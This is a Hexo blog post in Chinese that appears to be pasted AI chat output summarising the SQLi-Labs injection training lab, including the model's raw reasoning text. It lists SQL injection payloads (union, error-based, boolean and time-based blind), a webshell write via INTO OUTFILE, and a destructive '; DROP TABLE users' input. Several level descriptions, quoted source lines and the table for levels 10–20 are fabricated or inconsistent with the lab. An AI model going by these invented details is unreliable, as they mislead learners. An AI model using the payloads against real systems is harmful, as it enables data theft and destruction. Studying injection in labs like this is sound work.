<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="title: “我的第一篇 Obsidian 博客” date: 2025-07-01 10:00:00 tags: [Obsidian, Hexo] LESS-1：字符型注入（单引号闭合）PHP源码： $sql &#x3D; “select * from users where id&#x3D;’$id’ limit 0,1”; 解析： · 代码用$id拼接SQL语句，单引号闭合（’$id’）">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2025/07/01/ds%E6%80%BB%E7%BB%93sqlilabs/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="title: “我的第一篇 Obsidian 博客” date: 2025-07-01 10:00:00 tags: [Obsidian, Hexo] LESS-1：字符型注入（单引号闭合）PHP源码： $sql &#x3D; “select * from users where id&#x3D;’$id’ limit 0,1”; 解析： · 代码用$id拼接SQL语句，单引号闭合（’$id’）">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-07-01T08:15:56.960Z">
<meta property="article:modified_time" content="2025-07-01T05:08:38.000Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-ds总结sqlilabs" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/07/01/ds%E6%80%BB%E7%BB%93sqlilabs/" class="article-date">
  <time class="dt-published" datetime="2025-07-01T08:15:56.960Z" itemprop="datePublished">2025-07-01</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <hr>
<h2 id="title-“我的第一篇-Obsidian-博客”-date-2025-07-01-10-00-00-tags-Obsidian-Hexo"><a href="#title-“我的第一篇-Obsidian-博客”-date-2025-07-01-10-00-00-tags-Obsidian-Hexo" class="headerlink" title="title: “我的第一篇 Obsidian 博客” date: 2025-07-01 10:00:00 tags: [Obsidian, Hexo] "></a>title: “我的第一篇 Obsidian 博客” date: 2025-07-01 10:00:00 tags: [Obsidian, Hexo] </h2><h2 id="LESS-1：字符型注入（单引号闭合）"><a href="#LESS-1：字符型注入（单引号闭合）" class="headerlink" title="LESS-1：字符型注入（单引号闭合）"></a>LESS-1：字符型注入（单引号闭合）</h2><p>PHP源码：</p>
<p>$sql &#x3D; “select * from users where id&#x3D;’$id’ limit 0,1”;</p>
<p>解析：</p>
<p>· 代码用$id拼接SQL语句，单引号闭合（’$id’）。</p>
<p>· 判断注入点：输入id&#x3D;1’，页面报错说明存在注入。</p>
<p>· 联合查询：</p>
<p>?id&#x3D;-1’ union select 1, database(), version() –+  </p>
<p>用🔍查找数据库名（security）和版本号（5.7.26）。</p>
<h2 id="LESS-2：布尔盲注（无回显）"><a href="#LESS-2：布尔盲注（无回显）" class="headerlink" title="LESS-2：布尔盲注（无回显）"></a>LESS-2：布尔盲注（无回显）</h2><p>PHP源码：</p>
<p>$sql &#x3D; “select * from users where id&#x3D;’$id’ limit 0,1”;</p>
<p>解析：</p>
<p>· 页面仅返回成功或失败，无回显。</p>
<p>· 判断注入点：输入id&#x3D;1’ and 1&#x3D;2 –+，页面显示异常。</p>
<p>· 爆数据库名长度：</p>
<p>?id&#x3D;1’ and length(database())&#x3D;8 –+  </p>
<p>用🔢猜长度，最终得到security。</p>
<h2 id="LESS-3：字符型注入（括号闭合）"><a href="#LESS-3：字符型注入（括号闭合）" class="headerlink" title="LESS-3：字符型注入（括号闭合）"></a>LESS-3：字符型注入（括号闭合）</h2><p>PHP源码：</p>
<p>$sql &#x3D; “select * from users where id&#x3D;(‘$id’) limit 0,1”;</p>
<p>解析：</p>
<p>· 代码用(‘$id’)括号闭合，需用)闭合注入点。</p>
<p>· 联合查询：</p>
<p>?id&#x3D;1’) union select 1, database(), 3 –+  </p>
<p>用📊获取表名（users）。</p>
<h2 id="LESS-4：字符型注入（双引号闭合）"><a href="#LESS-4：字符型注入（双引号闭合）" class="headerlink" title="LESS-4：字符型注入（双引号闭合）"></a>LESS-4：字符型注入（双引号闭合）</h2><p>PHP源码：</p>
<p>$sql &#x3D; “select * from users where id&#x3D;(‘$id’) limit 0,1”;</p>
<p>解析：</p>
<p>· 代码用(‘$id’)双引号闭合，需用”闭合注入点。</p>
<p>· 爆表名：</p>
<p>?id&#x3D;1”) union select 1, table_name, 3 from information_schema.tables where table_schema&#x3D;’security’ –+  </p>
<p>用🔍查找表名（users）。</p>
<h2 id="LESS-5：报错注入（基于updatexml）"><a href="#LESS-5：报错注入（基于updatexml）" class="headerlink" title="LESS-5：报错注入（基于updatexml）"></a>LESS-5：报错注入（基于updatexml）</h2><p>PHP源码：</p>
<p>$sql &#x3D; “select * from users where id&#x3D;’$id’ limit 0,1”;</p>
<p>解析：</p>
<p>· 页面仅显示成功或错误，需用报错注入。</p>
<p>· 爆数据库名：</p>
<p>?id&#x3D;-1’ and updatexml(1,concat(0x7e,database(),0x7e),1) –+  </p>
<p>用🚨触发错误，从错误信息中提取security。</p>
<h2 id="LESS-6：报错注入（双引号闭合）"><a href="#LESS-6：报错注入（双引号闭合）" class="headerlink" title="LESS-6：报错注入（双引号闭合）"></a>LESS-6：报错注入（双引号闭合）</h2><p>PHP源码：</p>
<p>$sql &#x3D; “select * from users where id&#x3D;(‘$id’) limit 0,1”;</p>
<p>解析：</p>
<p>· 用双引号闭合注入点，报错注入步骤与LESS-5类似。</p>
<p>· 爆表名：</p>
<p>?id&#x3D;1”) union select 1, table_name, 3 from information_schema.tables where table_schema&#x3D;’security’ –+  </p>
<p>用📊获取表名（emails）。</p>
<h2 id="LESS-7：布尔盲注（时间延迟）"><a href="#LESS-7：布尔盲注（时间延迟）" class="headerlink" title="LESS-7：布尔盲注（时间延迟）"></a>LESS-7：布尔盲注（时间延迟）</h2><p>PHP源码：</p>
<p>$sql &#x3D; “select * from users where id&#x3D;’$id’ limit 0,1”;</p>
<p>解析：</p>
<p>· 用sleep()函数实现时间盲注：</p>
<p>?id&#x3D;1’ and if(length(database())&gt;3,sleep(5),1) –+  </p>
<p>用⏳等待5秒，判断数据库名长度。</p>
<h2 id="LESS-8：布尔盲注（length-函数）"><a href="#LESS-8：布尔盲注（length-函数）" class="headerlink" title="LESS-8：布尔盲注（length()函数）"></a>LESS-8：布尔盲注（length()函数）</h2><p>PHP源码：</p>
<p>$sql &#x3D; “select * from users where id&#x3D;’$id’ limit 0,1”;</p>
<p>解析：</p>
<p>· 通过length()函数逐位猜测数据库名：</p>
<p>?id&#x3D;1’ and length(database())&#x3D;8 –+  </p>
<p>用🔢逐位验证（如security长度为8）。</p>
<h2 id="LESS-9：时间盲注（sleep-过滤）"><a href="#LESS-9：时间盲注（sleep-过滤）" class="headerlink" title="LESS-9：时间盲注（sleep()过滤）"></a>LESS-9：时间盲注（sleep()过滤）</h2><p>PHP源码：</p>
<p>$sql &#x3D; “select * from users where id&#x3D;’$id’ limit 0,1”;</p>
<p>解析：</p>
<p>· sleep()被过滤时，改用benchmark()函数：</p>
<p>?id&#x3D;1’ and benchmark(1000000,sha1(‘test’)) –+  </p>
<p>用⏳观察页面响应速度。</p>
<h2 id="LESS-10：时间盲注（sleep-if-）"><a href="#LESS-10：时间盲注（sleep-if-）" class="headerlink" title="LESS-10：时间盲注（sleep()+if()）"></a>LESS-10：时间盲注（sleep()+if()）</h2><p>PHP源码：</p>
<p><code>$sql = &quot;select * from users where id=&#39;$id&#39; limit 0,1&quot;;</code></p>
<p>解析：</p>
<p>· 结合if()函数实现条件延迟：</p>
<p>?id&#x3D;1’ and if(length(database())&gt;3,sleep(5),1) –+  </p>
<p>用⏳验证数据库名长度（如security长度为8）。</p>
<p>总结</p>
<p>前十关主要围绕闭合方式（单引号、双引号、括号）和盲注技巧（布尔、报错、时间延迟）展开，核心是通过构造特殊SQL语句触发页面差异或错误信息，逐步提取数据库信息。</p>
<p>好的，我现在需要帮用户总结sqli-labs的65关，指出哪些关卡比较重要，以及它们围绕的知识点和总解题技巧。首先，我得仔细看看用户提供的搜索结果，看看各个网页里提到的关卡和知识点。</p>
<p>用户的问题分为三个部分：总结65关的重要关卡、各关围绕的知识点、总解题技巧。我需要从搜索结果中提取相关信息，并正确引用网页编号。</p>
<p>首先，关于重要关卡，搜索结果中多次提到前几关（如1-4、5、6、7、8）是基础，讲解了字符型、数字型注入、布尔盲注、报错注入等基础知识点。例如，网页[1]详细讲解了前几关的步骤，网页[2]和[4]也提到了类似的内容。此外，网页[6]和[10]提到后面的关卡如54-65涉及更复杂的过滤和绕过技巧，比如闭合符号变化、时间盲注等，这些也是重要部分。</p>
<p>接下来是知识点部分。根据网页[1]、[2]、[4]、[9]，各关主要围绕以下知识点展开：</p>
<ol>
<li><p>闭合方式：单引号、双引号、括号、注释符等（如网页[1]、[4]、[6]）。</p>
</li>
<li><p>注入类型：字符型、数字型、布尔盲注、报错注入、时间盲注（网页[2]、[4]、[5]、[6]）。</p>
</li>
<li><p>数据库结构：information_schema库的使用，查询表名、列名（网页[1]、[4]、[9]）。</p>
</li>
<li><p>绕过技巧：如双写绕过、注释符替换、URL编码（网页[10]、[11]）。</p>
</li>
<li><p>高级功能：文件读写、命令执行（网页[2]、[5]、[6]）。</p>
</li>
</ol>
<p>总解题技巧方面，网页[1]、[2]、[4]、[9]、[11]提到：</p>
<p>· 判断注入类型：通过输入特殊字符（如单引号）观察报错或回显变化。</p>
<p>· 联合查询：用于获取数据库信息（网页[1]、[4]、[8]）。</p>
<p>· 布尔&#x2F;时间盲注：当无回显时使用（网页[2]、[5]、[6]）。</p>
<p>· 利用内置函数：如database()、version()、updatexml()等（网页[2]、[5]、[10]）。</p>
<p>· 绕过过滤：替换关键字、使用注释、编码（网页[6]、[10]、[11]）。</p>
<p>需要确保每个部分都有对应的网页引用，比如提到闭合方式时引用网页[1]、[4]，绕过技巧引用网页[6]、[10]等。同时，注意用户要求用格式，且现在时间是2025年，但大部分网页是2023年及之前，不过网页[3]、[6]、[10]是较新的，可能需要优先引用较新的资料，但用户没有特别说明时间限制，所以只要在搜索结果中存在即可。</p>
<p>最后，整理结构，分点回答，确保每个部分清晰，引用正确。</p>
<p>以下是sqli-labs 65关的核心知识点总结及解题技巧，结合搜索结果整理：</p>
<p>一、重要关卡分布</p>
<ol>
<li>基础注入类型（1-4关）</li>
</ol>
<p>· 字符型&#x2F;数字型注入：通过闭合符号（单引号、双引号）判断注入类型，使用ORDER BY判断列数，联合查询获取数据库信息。</p>
<p>· 布尔盲注：通过AND 1&#x3D;1&#x2F;AND 1&#x3D;2判断条件，结合length()、ascii()等函数逐位猜测数据。</p>
<ol>
<li>报错注入（5-6关）</li>
</ol>
<p>· 利用updatexml()、extractvalue()等函数触发错误，从错误信息中提取数据库名、表名等。</p>
<ol>
<li>时间盲注（7-10关）</li>
</ol>
<p>· 通过sleep()或benchmark()函数延迟响应，判断条件是否成立。</p>
<ol>
<li>高级绕过与文件操作（54-65关）</li>
</ol>
<p>· 闭合符号变形：如’)、”))等绕过过滤。</p>
<p>· 文件读写：使用INTO OUTFILE写入Webshell。</p>
<p>· 10次尝试限制：需高效构造Payload，如结合GROUP_CONCAT和LIMIT。</p>
<p>二、核心知识点覆盖</p>
<ol>
<li>SQL注入类型</li>
</ol>
<p>· 字符型&#x2F;数字型、布尔盲注、报错注入、时间盲注、POST型注入。</p>
<ol>
<li>数据库结构</li>
</ol>
<p>· 利用information_schema库查询表名、列名（如tables、columns表）。</p>
<ol>
<li>绕过技巧</li>
</ol>
<p>· 关键字过滤：双写（oorr）、注释符替换（%00、–）。</p>
<p>· 编码绕过：URL编码、Hex编码。</p>
<ol>
<li>内置函数应用</li>
</ol>
<p>· database()、version()获取数据库信息；group_concat()拼接结果；sleep()实现时间延迟。</p>
<p>三、总解题技巧</p>
<ol>
<li>判断注入类型</li>
</ol>
<p>· 输入特殊字符（如’、and 1&#x3D;1）观察页面变化，结合ORDER BY判断列数。</p>
<ol>
<li>信息收集流程</li>
</ol>
<p>· 库名：union select 1, database(), 3。</p>
<p>· 表名：group_concat(table_name) from information_schema.tables。</p>
<p>· 字段名：group_concat(column_name) from information_schema.columns。</p>
<ol>
<li>盲注与绕过策略</li>
</ol>
<p>· 布尔盲注：and (length(database())&gt;3,sleep(5),1)。</p>
<p>· 报错注入：updatexml(1,concat(0x7e,database(),0x7e),1)。</p>
<p>· 时间盲注：if(ascii(substr(…))&#x3D;115,sleep(5),1)。</p>
<ol>
<li>工具与自动化</li>
</ol>
<p>· 使用sqlmap快速爆破（如–technique B布尔盲注）。</p>
<p>四、关键学习目标</p>
<p>· 理解SQL语句拼接原理及漏洞触发条件。</p>
<p>· 掌握数据库元数据查询方法（information_schema）。</p>
<p>· 熟练运用不同注入类型及绕过技巧应对实际场景。</p>
<p>嗯，用户之前提到了第10关到第20关的知识点，并且希望通过分析源码来了解如何过关。我之前给出了通用的编程和游戏类关卡的分析方法，但用户现在补充说他们指的是sqlilabs，也就是SQL注入练习平台。这说明我需要调整之前的回答，专注于SQL注入相关的知识点和关卡破解方法。</p>
<p>首先，我要确认用户的具体需求。他们可能在练习sqlilabs的进阶关卡，遇到了困难，希望通过源码分析来理解解题思路。用户可能已经掌握了基础注入技术，现在需要更深入的知识点来突破后面的关卡。</p>
<p>接下来，我需要回忆sqlilabs各个关卡的特点。通常，前几关介绍基本的SQL注入方法，比如单引号注入、UNION查询等。而从第10关开始，可能会涉及更复杂的防御机制，如WAF绕过、盲注、文件上传、XSS等其他漏洞的结合利用，甚至是一些进阶的技巧，如利用数据库函数或存储过程。</p>
<p>用户提到要详细的知识点和源码分析，所以我需要分阶段整理第10到20关可能涉及的技术点。例如，第10关可能开始涉及多参数注入或编码绕过，而后面关卡可能包括基于时间的盲注、二次注入、利用信息泄漏获取数据库信息等。</p>
<p>同时，用户希望知道如何通过分析源码来过关。这意味着我需要展示如何查看网页的源代码，寻找可能的漏洞点，比如未过滤的用户输入、错误的参数处理等。例如，在登录页面中，如果密码字段没有正确转义，可能存在注入点。通过分析源码中的SQL查询部分，可以构造相应的注入语句。</p>
<p>另外，考虑到不同关卡可能有不同的防御措施，比如使用了某些安全函数或参数化查询，这时候需要找到绕过的方法。例如，如果使用了PDO的prepare函数，可能需要寻找其他漏洞入口，或者利用预处理语句中的绑定变量不充分的场景。</p>
<p>还需要注意一些常见的错误配置，比如PHP的magic_quotes_gpc已禁用，但其他过滤不足，或者服务器使用旧版本的MySQL，存在已知漏洞。分析源码可以帮助发现这些配置问题，从而调整注入策略。</p>
<p>最后，我应该总结一个通用的分析流程，帮助用户系统地排查和利用漏洞。例如，步骤包括信息收集（如确定数据库类型、版本）、探测注入点、绕过WAF、构造恶意SQL语句等。每个步骤都需要结合源码分析，找出关键点和可能的绕过方法。</p>
<p>在组织内容时，要确保知识点由浅入深，覆盖从基础到进阶的内容，并且给出具体的例子和代码片段，让用户能够实际应用。同时，强调实践的重要性，鼓励用户通过尝试不同的注入方法来加深理解。</p>
<p>明白了！你是指 SQLi-Labs 这个经典的 SQL 注入练习平台（）。以下是针对 第10关到第20关 的详细知识点解析，以及通过分析源码通关的核心思路。</p>
<p>第10关到第20关核心知识点</p>
<ol>
<li>防御机制升级</li>
</ol>
<p>· 过滤规则：可能启用了关键词过滤（如 select, union, insert）或字符转义（如 addslashes()）。</p>
<p>· 参数化查询：部分关卡使用预处理语句（如 PDO 或 MySQLi 的 prepare()），但可能存在漏洞（如未绑定所有参数）。</p>
<p>· WAF（Web应用防火墙）：可能拦截简单注入语句，需通过编码、绕过或混淆语法突破。</p>
<ol>
<li>进阶注入技术</li>
</ol>
<p>关卡	技术重点	典型场景<br>10	多参数注入	URL或POST中多个参数组合注入<br>11	编码绕过（Base64&#x2F;URL编码）	绕过关键词过滤<br>12	基于时间的盲注（Time-based）	利用 sleep() 或 benchmark 函数<br>13	文件上传漏洞结合SQL注入	上传恶意文件获取数据库权限<br>14	XSS与SQL注入联动	通过XSS窃取CSRF Token再注入<br>15	二次注入（Second-order）	利用存储的恶意数据构造新查询<br>16	函数扩展（如 LOAD_FILE()）	读取服务器文件或导出数据<br>17	存储过程注入	调用恶意存储过程执行操作<br>18	基于错误的盲注（Error-based）	通过报错信息提取数据<br>19	利用信息泄漏（如 version()）	获取数据库版本和权限<br>20	综合挑战（混合漏洞）	结合文件上传+XSS+SQL注入</p>
<p>源码分析与通关思路</p>
<ol>
<li>分析源码的关键步骤</li>
</ol>
<p>(1) 定位SQL查询位置</p>
<p>· 查看网页源码（F12）或通过抓包工具（如 Burp Suite）分析请求，找到未过滤的用户输入点（如 $_GET[‘id’]、$_POST[‘username’]）。</p>
<p>· 示例代码片段（ vulnerable_page.php ）：</p>
<?php
$id = $_GET['id'];
$sql = "SELECT * FROM users WHERE id = '" . $id . "'";
$result = mysqli_query($conn, $sql);
?>

<p>· 漏洞点：直接拼接用户输入，未使用参数化查询或转义。</p>
<p>(2) 绕过防御机制</p>
<p>· 过滤规则绕过：若过滤了 union，可用 UNION ALL SELECT 或 &#x2F;<em>union</em>&#x2F;select。</p>
<p>· 字符转义绕过：若使用 addslashes()，可用双重反斜杠 \ 或 chr(92) 代替 \。</p>
<p>· 编码绕过：对注入语句进行 Base64 或 URL 编码（如 ?id&#x3D;1%2B1 → 1+1）。</p>
<p>(3) 构造恶意SQL</p>
<p>· 盲注：通过延时函数或报错信息提取数据：</p>
<p>– Time-based盲注<br>SELECT IF(SUBSTRING(database(),1,1)&#x3D;’s’, SLEEP(5), 0) FROM dual;</p>
<p>– Error-based盲注<br>SELECT 1&#x2F;0 WHEN SUBSTRING(database(),1,1)&#x3D;’s’ ELSE 1;</p>
<p>· 文件上传漏洞结合SQL注入：上传 .sql 文件后，通过注入语句读取文件内容：</p>
<p>SELECT LOAD_FILE(‘&#x2F;path&#x2F;to&#x2F;uploaded_file.sql’);</p>
<ol>
<li>分关卡通关示例</li>
</ol>
<p>关卡10：多参数注入</p>
<p>· 场景：URL包含多个参数（如 id&#x3D;1&amp;name&#x3D;admin）。</p>
<p>· 分析源码：</p>
<p>$sql &#x3D; “SELECT * FROM users WHERE id &#x3D; $id AND name &#x3D; ‘$name’”;</p>
<p>· 利用方法：构造联合查询绕过条件限制：</p>
<p>&#x2F;vulnerable_page.php?id&#x3D;1&amp;name&#x3D;’) UNION SELECT * FROM admin_table –</p>
<p>关卡13：文件上传漏洞</p>
<p>· 场景：允许上传图片文件，但未检查文件类型。</p>
<p>· 分析源码：</p>
<p>if ($_FILES[‘file’][‘type’] &#x3D;&#x3D; ‘image&#x2F;jpeg’) { … }</p>
<p>· 利用方法：</p>
<ol>
<li><p>上传一个包含恶意SQL的 .jpg 文件（通过修改MIME类型绕过检查）。</p>
</li>
<li><p>注入语句读取文件内容并执行：</p>
</li>
</ol>
<p>SELECT LOAD_FILE(‘&#x2F;uploads&#x2F;malicious.jpg’);</p>
<p>关卡17：存储过程注入</p>
<p>· 场景：应用程序调用动态执行的存储过程。</p>
<p>· 分析源码：</p>
<p>$proc_name &#x3D; $_GET[‘proc’];<br>$sql &#x3D; “CALL $proc_name(‘param’)”;</p>
<p>· 利用方法：</p>
<p>; DROP TABLE users; –</p>
<ol>
<li>通用工具与技巧</li>
</ol>
<p>· SQLMap：自动化检测和利用SQL注入漏洞（支持绕过WAF）。</p>
<p>· Burp Suite：手动构造和测试注入语句，拦截和分析响应。</p>
<p>· 数据库信息收集：</p>
<p>– MySQL<br>SELECT version(), user(), database();<br>– PostgreSQL<br>SELECT version();</p>
<p>总结</p>
<ol>
<li><p>逐关逆向分析：下载sqlilabs源码（GitHub仓库：），对照关卡代码调试。</p>
</li>
<li><p>关注防御漏洞：如 magic_quotes_gpc 是否开启、参数过滤逻辑是否完善。</p>
</li>
<li><p>组合漏洞利用：如文件上传+SQL注入+XSS（常见于高阶关卡）。</p>
</li>
</ol>
<p>如果有具体关卡卡住，可以提供代码片段或截图，我会进一步为你分析！</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/07/01/ds%E6%80%BB%E7%BB%93sqlilabs/" data-id="cmck98wpc0000qkuhfdczenky" data-title="" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2025/07/01/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/07/">July 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/07/01/ds%E6%80%BB%E7%BB%93sqlilabs/">(no title)</a>
          </li>
        
          <li>
            <a href="/2025/07/01/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>